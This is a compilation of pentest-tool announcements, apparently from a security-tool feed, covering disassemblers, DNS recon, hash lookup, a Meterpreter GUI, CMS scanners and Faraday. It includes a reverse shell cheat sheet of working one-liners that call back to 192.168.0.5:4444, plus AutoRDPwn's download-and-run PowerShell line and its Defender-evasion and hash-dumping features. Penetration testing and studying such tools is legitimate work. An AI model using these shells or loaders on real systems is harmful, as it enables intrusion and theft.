Xori – An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode

Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data.Acknowledgements:Xori wouldn’t exist without inspiration and ideas from the open source community. We are indebted to the work of the Capstone engine and the LLVM Project.Architectures:i386x86-64File FormatsPE, PE+Plain shellcodeCurrent FeaturesOutputs json of the 1) Disassembly, 2) Functions, and 3) Imports.Manages Image and Stack memory.2 modes:Light Emulation – meant to enumerate all paths (Registers, Stack, Some Instructions).Full Emulation – only follows the code’s path (Slow performance).Simulated TEB & PEB structures.Evaluates functions based on DLL exports.Displays strings based on referenced memory locations.Uses FLIRT style signatures (Fast Library Identification and Recognition Technology).Allows you to use your own exports for simulating the PEB.Will detect padding after a non-returning call.Will try to identify function references from offsets.What it doesn’t do yet:The engine is interactive.Does not dump strings.Does not process non-executable sections.TEB and PEB are not enabled for non-pe files.Only some x86 instructions are emulated, not all.Patching and assembling.No plugins or scripting.DocumentationRequirementsrustc 1.27.0Install rust for OSX & Linux Distroscurl https://sh.rustup.rs -sSf | shInstall rust for WindowsFirst get the rustup.exe (the rust toolchain installer) from here. This tool will install the rust compiler rustc, the rust package manager cargo and other usefull tools for development in rust.run the rustup.exeInstall rust prerequisitesin case you see this output, your Windows environment is missing the Build Tools for Visual Studio so keep reading, otherwise go here follow the link from the output, or click here cancel the rustup-init.exe back in browser, scroll down, expand the tab Tools for Visual Studio 2017 & download the Build Tools for Visual Studio 2017run the executablechoose the Visual C++ build tools & click “install", close the "Visual Studio Installer" after the installation Install rust toolchainrun the rustup.exe & you will see the following output after the successful installation you can see that the rust compiler rustc, rust package manager cargo and other tools were installed (under C:\Users\%username%\.cargo & C:\Users\%username%\.rustup) open a new "Command Prompt" & follow the xori build steps hereInstallation1. Build XoriThis command will also create other binaries such as pesymbols ans peinfo.git clone https://github.com/endgameinc/xori.gitcd xoricargo build –release2. Create xori.json config filecp xori.json.example xori.json[edit if desired]3. (Optional) Build the symbols filesIf you want to create your own symbol files you need to set the dll folders to where you stored your windows dlls."function_symbol32": "./src/analysis/symbols/generated_user_syswow64.json","function_symbol64": "./src/analysis/symbols/generated_user_system32.json","symbol_server": { "dll_folder32": "./dlls/32bit", "dll_folder64": "./dlls/64bit"Run pesymbols to overwrite the function_symbol json ./target/release/pesymbolsRun./target/release/xori -f test.exeRun all testscargo testBrowser GUI Chrome Firefox Safari IE Opera Latest ✔ Latest ✔ Latest ✔ x Latest ✔ Requirementsnodejsyarn (optional for UI dev)On Ubuntu 18.04 you may need to apt install the following: curl git libssl-dev pkg-config build-essential npmBuildcd guinpm installRunIn one terminalcd guinode src/server.jsIn another terminalcd guinpm startIt will open your default browser to http://localhost:3000/. The backend API is listening on localhost:5000.Download Xori

Link: http://feedproxy.google.com/~r/PentestTools/~3/4m8ecBSKkZc/xori-automation-ready-disassembly-and.html

Dnsdmpstr – Unofficial API & Client For Dnsdumpster.Com And Hackertarget.Com

Unofficial API & Client for DNS Dumpster and HackerTarget.com IP tools.https://dnsdumpster.com/https://hackertarget.com/ip-tools/Installationgit clone https://github.com/zeropwn/dnsdmpstrcd dnsdmpstrpip3 install -r requirements.txtchmod +x ddump.pyUsageAs a command-line utilitytarget=”hackerone.com"python3 ddump.py -u $target –allExtended usageusage: ddump.py [-h] [-u U] [-a] [-r] [-d] [-dd] [–links] [–headers] [–all]optional arguments: -h, –help show this help message and exit -u U target domain -a host search (DNS A Record lookup) -r reverse dns lookup (accepts IP, IP range or domain name) -d dns lookup -dd classical dns dump format –links grab page links from url –headers grab http headers from url –all grab all information availableAs a libraryimport dnsdmpstrtarget = "hackerone.com"dnsdump = dnsdmpstr()print(json.dumps(dnsdump.dump(target), indent=1))print(dnsdump.hostsearch(target))print(dnsdump.reversedns(target))print(dnsdump.dnslookup(target))print(dnsdump.pagelinks(target))print(dnsdump.httpheaders(target))Download Dnsdmpstr

Link: http://feedproxy.google.com/~r/PentestTools/~3/cJrHa_dhIkQ/dnsdmpstr-unofficial-api-client-for.html

Hashboy-Tool – A Hash Query Tool

Hashboy was redeveloped on hash-busterAuthor:LeiothrixHow to install $git clone https://github.com/sf197/hashboy-tool $cd hashboy-tool $python3 hashboy.pyHow to use$ python3 hashboy.py __ __ __ / /_ ____ ______/ /_ / /_ ____ __ __ / __ \/ __ `/ ___/ __ \/ __ \/ __ \/ / / / / / / / /_/ (__ ) / / / /_/ / /_/ / /_/ / /_/ /_/\__,_/____/_/ /_/_.___/\____/\__, / /____/Author:Leiothrix Github:https://github.com/sf197usage: hashboy.py [-h] [-s HASH] [-f FILE] [-t THREADS]optional arguments: -h, –help show this help message and exit -s HASH, –hash HASH hash -f FILE, –file FILE file containing hashes -t THREADS, –threads THREADS number of threadsVideoDownload Hashboy-Tool

Link: http://feedproxy.google.com/~r/PentestTools/~3/WF_Ut4LqVas/hashboy-tool-hash-query-tool.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.For now it only supports windows/meterpreter & android/meterpreterGetting StartedPlease follow these instructions to get a copy of Kage running on your local machine without any problems.PrerequisitesMetasploit-framework must be installed and in your PATH:MsfrpcdMsfvenomMsfdbInstallingYou can install Kage binaries from here.for developersto run the app from source code:# Download source codegit clone https://github.com/WayzDev/Kage.git# Install dependencies and run kagecd Kageyarn # or npm installyarn run dev # or npm run dev# to build projectyarn run buildelectron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.ScreenshotsVideo TutorialContactTwitter: @iFalahEmail: ifalah@protonmail.comCreditsMetasploit Framework – (c) Rapid7 Inc. 2012 (BSD License)http://www.metasploit.com/node-msfrpcd – (c) Tomas Gonzalez Vivo. 2017 (Apache License)https://github.com/tomasgvivo/node-msfrpcelectron-vue – (c) Greg Holguin. 2016 (MIT)https://github.com/SimulatedGREG/electron-vueThis project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.Download Kage

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.Php :php -r ‘$sock=fsockopen(“192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");’Python :python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’Bash :bash -i >& /dev/tcp/192.168.0.5/4444 0>&1Netcat :nc -e /bin/sh 192.168.0.5 4444Perl :perl -e ‘use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’Ruby :ruby -rsocket -e’f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)’Java :r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()xterm :xterm -display 192.168.0.5:4444Source Reverse-Shell-Cheatsheet

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ygxu7rgH7jo/reverse-shell-cheat-sheet.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

CMSeeK v1.1.1 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 150 Other CMSs)

What is a CMS?A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.Release History- Version 1.1.1 [01-02-2019]- Version 1.1.0 [28-08-2018]- Version 1.0.9 [21-08-2018]- Version 1.0.8 [14-08-2018]- Version 1.0.7 [07-08-2018]…Changelog FileFunctions Of CMSeek:Basic CMS Detection of over 155 CMSDrupal version detectionAdvanced WordPress ScansDetects VersionUser EnumerationPlugins EnumerationTheme EnumerationDetects Users (3 Detection Methods)Looks for Version Vulnerabilities and much more!Advanced Joomla ScansVersion detectionBackup files finderAdmin page finderCore vulnerability detectionDirectory listing checkConfig leak detectionVarious other checksModular bruteforce systemUse pre made bruteforce modules or create your own and integrate with itRequirements and Compatibility:CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.Installation and Usage:It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:git clone https://github.com/Tuhinshubhra/CMSeeKcd CMSeeKpip/pip3 install -r requirements.txtFor guided scanning:python3 cmseek.pyElse:python3 cmseek.py -u […]Help menu from the program:USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>SPECIFING TARGET: -u URL, –url URL Target Url -l LIST, -list LIST path of the file containing list of sites for multi-site scan (comma separated)RE-DIRECT: –follow-redirect Follows all/any redirect(s) –no-redirect Skips all redirects and tests the input target(s)USER AGENT: -r, –random-agent Use a random user agent –googlebot Use Google bot user agent –user-agent USER_AGENT Specify a custom user agentOUTPUT: -v, –verbose Increase output verbosityVERSION & UPDATING: –update Update CMSeeK (Requires git) –version Show CMSeeK version and exitHELP & MISCELLANEOUS: -h, –help Show this help message and exit –clear-result Delete all the scan resultEXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com –user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com –random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.comChecking For Update:You can check for update either from the main menu or use python3 cmseek.py –update to check for update and apply auto update.P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.Detection Methods:CMSeek detects CMS via the following:HTTP HeadersGenerator meta tagPage source coderobots.txtSupported CMSs:CMSeeK currently can detect 157 CMS. Check the list here: cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way: cmsID = { ‘name’:’Name Of CMS’, ‘url’:’Official URL of the CMS’, ‘vd’:’Version Detection (0 for no, 1 for yes)’, ‘deeps’:’Deep Scan (0 for no 1 for yes)’ }Scan Result:All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they’re stored in a txt file under the site’s result directory as well.Here is an example of the json report log:Bruteforce Modules:CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module Copy and paste the module in the brutecms directory under CMSeeK’s directory Open CMSeeK and Rebuild Cache using U as the input in the first menu. If everything is done right you’ll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.Need More Reasons To Use CMSeeK?If not anything you can always enjoy exiting CMSeeK (please don’t), it will bid you goodbye in a random goodbye message in various languages.Also you can try reading comments in the code those are pretty random and weird!!!Screenshots:Main Menu Scan ResultWordPress Scan ResultGuidelines for opening an issue:Please make sure you have the following info attached when opening a new issue:TargetExact copy of error or screenshot of errorYour operating system and python versionIssues without these informations might not be answered!Follow @r3dhax0r:TwitterTeam:Team : Virtually Unvoid Defensive (VUD)Download CMSeeK v1.1.1

Link: http://feedproxy.google.com/~r/PentestTools/~3/8EDnhSxC2Hw/cmseek-v111-cms-detection-and.html

Faraday v3.6 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.6:Welcome Service NowA new way to send vulnerabilities is available! We integrated Faraday with Service Now, giving you more options to work with.Burp plugin was totally revamped We have been working hard to make several changes to enhance your daily workflow:Burp plugin that uses the Faraday server API, so you don’t have to use the GTK clientThe plugin was rewritten in JavaWe added 2FA support to increase securityWe empowered Jira integration Can you imagine sending multiple vulns to Jira without filling the form out every time? With Faraday v3.6 now you can!With this integration, you don’t have to connect your Jira credentials every time you use it, just do it once and you’re ready to go. You also have the option to override default settings and switch projects or username.Jira is one of our most important integrations and we want to help you to get the most out of it.Learn more about your vulns to mitigate them better In this new version, we added more fields to enrich the Vulnerability Templates, hopefully improving an important part of your daily workflow. This new feature allows you to have all the data you need in one place.Added  fields’impact’,’easeofresolution’ ‘policyviolations’ Other plugins updated in this versionNetsparkersSQLMapDnsmapSSLyze Nessus GoohostDownload Faraday v3.6

Link: http://feedproxy.google.com/~r/PentestTools/~3/xuC5gpNVqec/faraday-v36-collaborative-penetration.html